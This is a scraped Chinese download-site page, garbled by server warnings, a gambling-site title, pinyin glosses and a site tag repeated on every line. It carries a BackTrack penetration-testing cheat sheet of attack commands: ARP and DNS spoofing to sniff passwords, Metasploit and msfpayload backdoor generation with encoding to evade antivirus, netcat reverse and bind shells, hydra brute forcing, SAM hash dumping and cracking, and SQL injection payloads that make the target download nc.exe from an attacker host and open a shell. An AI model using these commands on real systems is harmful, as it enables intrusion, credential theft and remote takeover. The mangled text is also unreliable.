Warning: mkdir(): No space left on device in /www/wwwroot/jx.baidu.com/func.php on line 159

Warning: file_put_contents(./web/hch368.com/cache/5a/127c8/a5655.html): failed to open stream: No such file or directory in /www/wwwroot/jx.baidu.com/func.php on line 149
GG扑克
" />

GG扑克




  • 红软基地:您身边最放心的安(ān)全下载站!
您所在的位置:首页 > 软件 > 应用软件 > 教育学习(xí) > BackTrack渗(shèn)透测试笔记(jì)

BackTrack渗透测试笔记(jì)

软件(jiàn)类(lèi)型:
国(guó)产软件
软(ruǎn)件(jiàn)语(yǔ)言:
简体中文(wén)
软件大小:
6 MB
软(ruǎn)件授权:
免(miǎn)费软件(jiàn)
软件评级:
4
更新时(shí)间:
2017-05-25
应用平台:
WinXP, Win7, WinAll
软件(jiàn)简介(jiè)

BackTrack渗透测(cè)试笔记是一款BT5学习笔(bǐ)记,使用(yòng)BT5的同学可以(yǐ)看(kàn)看,不仅仅是用来破解WIFI,BT5还有更强大的(de)功能。 体积小,但功能强大。界面非常清爽(shuǎng),简单易操作。3a0红软基地

软件功能

0x01.1 PTES 标准中的渗(shèn)透测试(shì)阶段3a0红软基地
0x01.1.1 前期交互阶段3a0红软基地
0x01.1.2 情报搜集(jí)阶段3a0红软基地
0x01.1.3 威胁建模阶段3a0红软基地
0x01.1.4 漏洞(dòng)分析阶段(duàn)3a0红软基地
0x01.1.5 渗透攻击阶段(duàn)3a0红软基地
0x01.1.6 后渗透攻(gōng)击阶段3a0红软基(jī)地
0x01.1.7 报(bào)告阶(jiē)段3a0红软基(jī)地
0x01.2 渗透测试(shì)类型3a0红软基地
0x01.2.1 白盒测试3a0红(hóng)软基地
0x01.2.2 黑盒测试(shì)3a0红软基地
0x01.3 小结3a0红软基地(dì)
0x02 渗(shèn)透环境搭建3a0红软基地
>3a0红软基地
0x03 常用信息收集3a0红(hóng)软基地
0x03.1 被动(dòng)信息收集3a0红(hóng)软基地(dì)
0x03.2 主动信息收集(jí)3a0红(hóng)软基(jī)地
0x03.3 针对性(xìng)扫描3a0红(hóng)软基地
0x03.4 小结(jié)3a0红软(ruǎn)基地(dì)
0x04 信息(xī)收集的附属工作3a0红软基地(dì)
0x04.1 基本的(de)漏洞(dòng)扫(sǎo)描3a0红软基地
0x04.2 使用 Nessus 进行(háng)扫(sǎo)描3a0红软(ruǎn)基地(dì)
0x04.3 专用漏洞扫描器(qì)3a0红软基地
0x05 社会工程学攻击3a0红软基地(dì)
0x05.1 针对性的(de)钓鱼攻击3a0红软基地
0x05.2 web 向量攻击3a0红软基地
0x05.3 SET 的其他特性3a0红软基地
0x05.4 小结。3a0红软(ruǎn)基地

软件(jiàn)说明(míng)

ping 域名(míng)/ip 测试本(běn)机到远端主机是否联通(tōng)。3a0红软基地
dig 域名/ip 查看域名解析的详细信息。3a0红(hóng)软(ruǎn)基地
host -l 域名 dns服务器 传输zone。3a0红软基地
扫描3a0红软基地
nmap:3a0红软基地(dì)
-sS 半开扫描(miáo)TCP和(hé)SYN扫描(miáo)。3a0红软(ruǎn)基地
-sT 完全(quán)TCP连(lián)接扫描(miáo)。3a0红软基地
-sU UDP扫描3a0红(hóng)软基地
-PS syn包探测(防火墙探测(cè))3a0红软(ruǎn)基地
-PA ack包探(tàn)测(防(fáng)火墙探测(cè))3a0红软基地
-PN 不ping。3a0红软基地
-n 不dns解析。3a0红软基地
-A -O和(hé)-sV。3a0红软(ruǎn)基地
-O 操作系统识别。3a0红软(ruǎn)基(jī)地
-sV 服务(wù)版本(běn)信息(banner)3a0红软基地
-p 端口扫描。3a0红软(ruǎn)基地
-T 设置(zhì)时间级别(bié)(0-5)3a0红软基地
-iL 导入扫描结果。3a0红软基地
-oG 输出(chū)扫描(miáo)结果。3a0红软基地
操(cāo)作(zuò)系统识别:3a0红软基地
p0f -i eth0 -U -p 开(kāi)启混杂模式(shì)。3a0红软(ruǎn)基地(dì)
xprobe2 ip|域名 检测os。3a0红软基地(dì)
banner获取(qǔ):3a0红(hóng)软基地
nc ip port 检测端口是否打开(kāi)。3a0红软(ruǎn)基地
telnet ip port 检(jiǎn)测端口是否打开。3a0红(hóng)软基地
wget ip 下载主页。3a0红软(ruǎn)基地
cat index.html | more 显示主页代码(mǎ)。3a0红软基(jī)地
q 退出。3a0红软基地
windows枚举3a0红软基(jī)地
nmap -sS -p 139,445 ip 扫描(miáo)windows。3a0红软基地
cd /pentest/enumeration/smb-enum3a0红(hóng)软基(jī)地
nbtscan -f targetIP 检测netbioses。3a0红软基地
smbgetserverinfo -i targetIP 扫(sǎo)描name,os,组(zǔ)。3a0红软(ruǎn)基地
smbdumpusers -i targetIP 列出用(yòng)户。3a0红(hóng)软基(jī)地
smbclient -L //targetIP 列出共享(xiǎng)。3a0红软基地
使用windows:3a0红软基地
net use \\ip\ipc$ "" /u:"" 开启空会话(huà)。3a0红软基地
net view \\ip 显示共享信息。3a0红软基地
smbclient:3a0红软基地
smbclient -L hostName -I targetIP 枚(méi)举共享。3a0红软基地
smbclient -L hostName/share -U "" 用空用户连接。3a0红软基地
smbclient -L hostName -I targetIP -U admin普通用户连接。3a0红(hóng)软基(jī)地
rpcclient:3a0红(hóng)软(ruǎn)基地(dì)
rpcclient targetIP -U ""打开一个空(kōng)会话(huà)。3a0红软基(jī)地
netshareenum 枚举共(gòng)享。3a0红软基地(dì)
enumdomusers 枚举用(yòng)户(hù)。3a0红软基地
lsaenumsid 枚举域SID。3a0红(hóng)软基(jī)地
queryuser RID 查(chá)询(xún)用(yòng)户信息(xī)。3a0红(hóng)软基(jī)地
createdomuser 创(chuàng)建用户访问。3a0红软基地
ARP欺骗:3a0红软基(jī)地
ettercap:3a0红软基(jī)地(dì)
nano /usr/local/etc/etter.conf配置文件(jiàn)3a0红软基地(dì)
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡3a0红软(ruǎn)基地
Hosts > Scan for hosts (do this two times)扫描网段的主(zhǔ)机3a0红软基地
Hosts > Hosts list 显(xiǎn)示(shì)主(zhǔ)机列表(biǎo)3a0红软基地
Select the default gateway > Add to Target 1 添加(jiā)主机3a0红软(ruǎn)基地
Select the target > Add to Target 2 添(tiān)加主机(jī)3a0红软(ruǎn)基(jī)地
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻(gōng)击(jī)3a0红软基地
Start > Start sniffing 开始攻击3a0红软基(jī)地
dsniff -i eth0 监听网卡窃听(tīng)登(dēng)录用(yòng)户(hù)密码(mǎ)3a0红软基地
urlsnarf -i eth0 嗅探http请求3a0红软基地
msgsnarf -i eth0 嗅(xiù)探聊天软件(jiàn)的聊天内(nèi)容3a0红软基地(dì)
driftnet -i eth0 网(wǎng)络管理嗅探(tàn)图片,音频。3a0红软基地
dns欺骗:3a0红软基地(dì)
nano /usr/local/share/ettercap/etter.dns编(biān)辑配置(zhì)文件3a0红软(ruǎn)基地
Plugins > Manage the plugins > dns_spoof 设置dns欺骗(piàn)3a0红软基地
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP3a0红软基地
Start > Start sniffing 开(kāi)始攻击3a0红软基地
Exploits漏洞利用:3a0红软(ruǎn)基地
cd /pentest/exploits/exploit-db 进入目(mù)录(lù)3a0红(hóng)软基地
cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞3a0红软基地
cat exploit | grep "#include"检查运行(háng)环(huán)境3a0红软基地
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可(kě)以在linux下运行的(de)代码3a0红(hóng)软基地
Metasploit:3a0红软(ruǎn)基地
svn update 升(shēng)级3a0红(hóng)软基地
./msfweb Web接口127.0.0.1:55555。.3a0红(hóng)软基(jī)地
./msfconsole 字符下的Console。3a0红软基地
help 帮(bāng)助(zhù)3a0红(hóng)软基地
show <option> 显(xiǎn)示选项3a0红(hóng)软基地(dì)
search <name> 搜索名字3a0红软(ruǎn)基地
use <exploit name> 使用漏洞3a0红软基地
show options 显示选项3a0红(hóng)软基(jī)地(dì)
set <OPTION NAME> <option> 设(shè)置选项3a0红软(ruǎn)基(jī)地
show payloads 显(xiǎn)示装置3a0红软(ruǎn)基地
set PAYLOAD <payload name> 设置装置3a0红软基地
show options 显示选项3a0红软基地(dì)
set <OPTION NAME> <option> 设置选项3a0红(hóng)软基地
show targets 显(xiǎn)示目标(os版本)3a0红软基地
set TARGET <target number> 设置(zhì)目(mù)标版本3a0红(hóng)软基地
exploit 开始漏洞攻击(jī)3a0红(hóng)软(ruǎn)基地
sessions -l 列出会话3a0红软基地
sessions -i <ID> 选择会(huì)话3a0红软基地
sessions -k <ID> 结束会话3a0红软基地
<ctrl> z 把(bǎ)会(huì)话放到后台3a0红软基地
<ctrl> c 结束会话3a0红软基地
jobs 列出漏洞(dòng)运行工作3a0红(hóng)软基地(dì)
jobs -K 结束一个漏(lòu)洞运行工作3a0红软基地
show auxiliary 显示辅(fǔ)助模(mó)块3a0红软基地
use <auxiliary name> 使用辅助模块3a0红软(ruǎn)基地
set <OPTION NAME> <option> 设置选项3a0红软基地
run 运行模块3a0红软基地
scanner/smb/version 扫描系(xì)统版本3a0红软基地
scanner/mssql/mssql_ping 测试mssql是否在线3a0红软基地
scanner/mssql/mssql_login 测试登录(暴(bào)力或字典)3a0红软基地
Attacker behind firewall: bind shell正向(xiàng)3a0红软基地
Target behind firewall: reverse shell反向3a0红软基地(dì)
Meterpreter衔接不(bú)懂dos的可以用这个:3a0红软基地
db_import_nessus_nbe 加载nessus的扫描结果3a0红软基地
db_import_nmap_xml 加载(zǎi)nmap的扫描结果3a0红软基地
自动化(huà)攻击流程:3a0红软基地
cd /pentest/exploit/framework33a0红软基地(dì)
./msfconsole3a0红软基地
load db_sqlite33a0红软基地
db_destroy pentest3a0红软基地(dì)
db_create pentest3a0红软基地
db_nmap targetIP3a0红软基地
db_hosts3a0红软基地
db_services3a0红软基地
db_autopwn -t -p -e3a0红软基(jī)地(dì)
字符接口攻击流(liú)程(chéng):3a0红(hóng)软基(jī)地
./msfcli | grep -i <name>3a0红软(ruǎn)基地
./msfcli <exploit or auxiliary> S3a0红(hóng)软基地
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E3a0红软基(jī)地(dì)
做木马后门等:3a0红软基地
./msfpayload <payload> <variable=value> <output type>3a0红(hóng)软基地
S summary and options of payload3a0红软基地
C C language3a0红软基地
P Perl3a0红软(ruǎn)基地
y Ruby3a0红软基地
R Raw, allows payload to be piped into msfencode and other tools3a0红软基地
J JavaScript3a0红软基地
X Windows executable3a0红软基地
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C3a0红软基地(dì)
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe3a0红软基地
编码处理就(jiù)是做(zuò)免杀:3a0红(hóng)软基地
./msfencode <options> <variable=value>3a0红(hóng)软基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -l3a0红软基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -e PexFnstenvMor -t c3a0红软(ruǎn)基地
入侵(qīn)后(hòu)在windows下添加管理(lǐ)员(yuán)用户(hù):3a0红软基地
hostname 查看主机(jī)名3a0红(hóng)软基地(dì)
net users 查看用(yòng)户3a0红软基地
net user 用户 密码 /add 添加用户3a0红软基地
net localgroup 查看工作组(zǔ)3a0红软(ruǎn)基地
net localgroup administrators 查看管理员组3a0红软(ruǎn)基地
net localgroup administrators x /add 将用户加入管理(lǐ)员组3a0红软基地
TFTP3a0红软基地(dì)
cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到(dào)tftp上3a0红软基(jī)地
tftp -i 10.1.1.2 GET nc.exe下载3a0红软基地
netcat瑞(ruì)士军刀3a0红(hóng)软(ruǎn)基地
attacker: 10.1.1.13a0红软基(jī)地
target: 10.1.1.23a0红软基地
nc -v -z 10.1.1.2 1-1024 端口扫描3a0红软基地
target: nc -lvp 4444 聊天设置(zhì)(服务)3a0红软基(jī)地
attacker: nc -v 10.1.1.2 4444 聊天设置(zhì)(客户)3a0红软基地
target: nc -lvp 4444 > output.txt传(chuán)输(shū)文件(jiàn)(接受)3a0红软(ruǎn)基地
attacker: nc -v 10.1.1.2 4444 < test.txt传输(shū)文件(发送(sòng))3a0红软基(jī)地
target: nc -lvp 4444 -e cmd.exe Bind shell。3a0红软基地
attacker: nc -v 10.1.1.2 44443a0红软(ruǎn)基地(dì)
target:nc -lvp 4444 Reverse shell。3a0红(hóng)软基地
attacker:nc -v 10.1.1.2 4444 -e /bin/bash3a0红软基地
密码(mǎ)3a0红软基(jī)地(dì)
字(zì)典zcat /pentest/password/dictionaries/wordlist.txt.Z > words3a0红软基地
cat words | wc -l显示(shì)个数(30多万个)3a0红软基地
暴力:3a0红软基地
hydra -l ftp -P words -v targetIP ftp 攻击ftp。3a0红软基(jī)地
hydra -l muts -P words -v targetIP pop3 攻击pop33a0红软基地
hydra -P words -v targetIP snmp 攻(gōng)击snmp3a0红(hóng)软基(jī)地
攻击microsof VPN3a0红软基(jī)地
nmap -p 1723 targetIP3a0红软基地
dos2unix words3a0红软基地
cat words | thc-pptp-bruter targetIP3a0红软基地
WYD:3a0红软基地
wget -r target.com –accept=pdf 下载pdf文档3a0红软基(jī)地
wyd.pl -o output.txt .target.com/3a0红软基地
cat output.txt | more3a0红软基地
SAM文(wén)件(windows下的(de)密码文(wén)件):3a0红(hóng)软基(jī)地
%SYSTEMROOT%/system32/config3a0红软基地(dì)
%SYSTEMROOT%/repair3a0红软基地
备份windows的hash文(wén)件:3a0红软基(jī)地
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E3a0红(hóng)软基地(dì)
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\3a0红软基地
meterpreter > execute -f cmd -c3a0红(hóng)软基地(dì)
meterpreter > interact x3a0红软基(jī)地
C:\WINDOWS\system32> pwdump \\127.0.0.13a0红软基地
john破解密码:3a0红(hóng)软基地
cp hash.txt /pentest/password/john-1.7.2/run/3a0红(hóng)软基地
cd /pentest/password/john-1.7.2/run/3a0红软基(jī)地
./john hash.txt3a0红软基地
彩虹表:3a0红软基地
rcrack *.rt -f hash.txt3a0红软基地
本地修改密(mì)码:3a0红软基地
mount3a0红软基地
umount /mnt/hda13a0红软基地(dì)
modprobe fuse3a0红软基地
ntfsmount /dev/hda1 /mnt/hda13a0红软基地
mount3a0红软基地
ls -l /mnt/hda1 挂载c盘3a0红软基地
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt3a0红(hóng)软基地(dì)
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 备份(fèn)sam文件3a0红软基地
直(zhí)接修改sam文(wén)件:3a0红软(ruǎn)基(jī)地
chntpw /mnt/sda1/WINDOWS/system32/config/SAM3a0红软基地
Blank the password. *3a0红软基地
Do you really wish to change it? y3a0红软基地
Write hive files? y3a0红软(ruǎn)基地
unmount /mnt/sda13a0红软(ruǎn)基地(dì)
reboot3a0红软基(jī)地
SQL 注入3a0红软基地
nmap -sS -p 1521 targetIP 扫描oracle3a0红软基地
nmap -sS -p T:1433,U:1434 targetIP 扫描mssql3a0红软基地
' or 1=1–验证旁路(lù)3a0红软基(jī)地
列举表名:3a0红软基(jī)地(dì)
' having 1=1–3a0红软基(jī)地
' group by table having 1=1–3a0红(hóng)软基地
' group by table, table2 having 1=1–3a0红软基地
' group by table, table2, table3 having 1=1–3a0红软基地
列举列类型:3a0红软基地
union select sum(column) from table –3a0红软基(jī)地
union select sum(column2) from table –3a0红软基地
添加(jiā)数据:3a0红软基地
' ; insert into table values('value','value2′,'value3′)–3a0红软基(jī)地
MSSQL存储程序:3a0红软(ruǎn)基地
输(shū)出(chū)数据库中备案信息到一个html文件(jiàn),您可以(yǐ)查看与一(yī)个浏览器。3a0红软基地
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; —.target.com/test.html3a0红软(ruǎn)基地
运(yùn)行(háng)ipconfig在浏览器(qì)查看信息。3a0红(hóng)软基地
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' .target.com/test.txt3a0红软基地
上传后门。3a0红软基地
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; –3a0红软基地
攻击者: nc -lvp 533a0红软基地
spreadfold。3a0红(hóng)软基地

相关介绍

bt5,全称Back Track five,是继bt3,bt4之后的最新版。这是一个(gè)linux环境的便(biàn)携系统,可以(yǐ)放到U盘或者硬盘(pán)中(zhōng)启动,对本身(shēn)硬盘没有影响,无(wú)需在本(běn)地安装(zhuāng)。内置大量的网络安(ān)全检测工具以及黑客(kè)破解(jiě)软件等。3a0红软(ruǎn)基地

软件截图

BackTrack渗透测试(shì)笔记3a0红(hóng)软基地(dì)

软件下载地(dì)址
BackTrack渗透测试笔记
软件推荐
下载排行

精(jīng)品软件

热门关键词

热门软件推荐(jiàn)